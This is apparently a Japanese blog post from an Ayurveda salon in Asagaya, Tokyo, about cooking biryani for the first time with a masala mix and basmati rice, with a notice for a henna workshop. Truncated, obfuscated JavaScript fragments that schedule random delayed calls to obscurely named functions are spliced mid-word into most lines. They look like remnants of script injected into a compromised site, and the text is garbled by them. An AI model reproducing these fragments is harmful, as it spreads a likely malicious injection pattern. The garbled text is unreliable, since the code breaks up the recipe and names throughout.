ビリヤニ初挑戦!

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
2013年1月19日(土)ヘナ体験ワークショップ申込受付中andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
さて、クリスマスイブですね~
やっぱり今日はご予約がなかったので(笑)
自分のための美味しいご飯を作りました
こないだ仕入れた、こちらが大事な材料。
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ビリヤニ・マサラミックスandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
バスマティライスandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}です。
ビリヤニandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}とは、炊き込みご飯のようなもの。
中東から、南インド・パキスタンなどで良く食べられるみたいで
私もケララに研修に行ったとき、初めて食べたのです。
※「ビリヤニ」とは⇒ウィキベディア
そして、とても気に入ったのですが、作り方を調べると
それなりに手間がかかるみたいだったので
なかなか実行せずにいました。
が、良く行くインド食材店でこのビリヤニ用マサラミックスを見つけ
その作り方を教えてもらったので、挑戦してみることに。
ビリヤニ作るなら、米はバスマティandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}じゃないと
1キロ入りの小さなものを買ってみました。
バスマティもインド・パキスタンのお米。
長くて軽いので、たくさん食べてももたれません
(いや、たくさん食べたらダメなんですけども:笑)
※「バスマティ」とは⇒ウィキペディア
そんなビリヤニさんは、
簡単に作るなら、炊飯器でも炊けるそうなのですが
ビリヤニとは、本来、カレーとご飯を別々に作って
それを最後に重ねて蒸すことでスパイスの香り高い
ビリヤニができるとのこと。
それなら、別々に作ったるわ
箱裏の英語で書かれたレシピとネットのレシピを参考に
半量を見よう見まねで作ってみたところ…
IMG_20121224_113817s.jpg
出来ました大成功andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
今回使った「shan」のマサラミックスは
少し辛めと言っている方がいたのですが
途中の味見でかなり辛かったため、ご飯を少し増量したら
ちょうど良い感じになりました~
そしてビリヤニは、横に添えてあるライタandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
一緒に食べるのが美味しいです。
ライタandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}とは、刻んだキュウリやトマト、玉ねぎなどを
ヨーグルトで合え、スパイスや塩で味付けしたサラダ。

今日のは、キュウリ・トマト・セロリに
クミンとお塩で味付け。これだけでも美味い~~
ビリヤニのピリッとくる辛さを
ライタでまろやかにしながら食べると
いくらでも食べれそうな美味しさ
andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

あともう一回作れるのが嬉しいな~~
ただ、半量でも尋常じゃない量ができたので(笑)
これから近所のお友達におすそ分けに行ってきます
2013年1月19日(土)ヘナ体験ワークショップ開催⇒詳細はこちらandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
アーユルヴェーダサロンmanas 《マナス》

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